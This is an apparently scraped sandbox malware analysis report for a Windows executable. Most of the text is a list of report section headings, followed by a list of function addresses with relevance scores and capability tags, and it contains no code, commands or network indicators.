Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

Windows Analysis Report
P3KxDOMmD3.exe

Function 00401180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 196
sleepstringCOMMON

Function 0066E68C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 165
networkfileCOMMONLIBRARYCODE

Function 00675E28 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
stringCOMMONLIBRARYCODE

Function 00661184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50
pipefileCOMMON

Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54
threadCOMMON

Function 0066EA48 Relevance: 9.1, APIs: 6, Instructions: 109
networkCOMMONLIBRARYCODE

Function 0066CA74 Relevance: 7.8, APIs: 6, Instructions: 296
COMMONLIBRARYCODE

Function 0066F014 Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47
memorythreadCOMMON

Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Function 0066F118 Relevance: 3.0, APIs: 2, Instructions: 42
networkCOMMONLIBRARYCODE

Function 001B96B4 Relevance: 1.6, APIs: 1, Instructions: 149
libraryCOMMON

Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Function 001B9324 Relevance: 1.3, APIs: 1, Instructions: 87
memoryCOMMON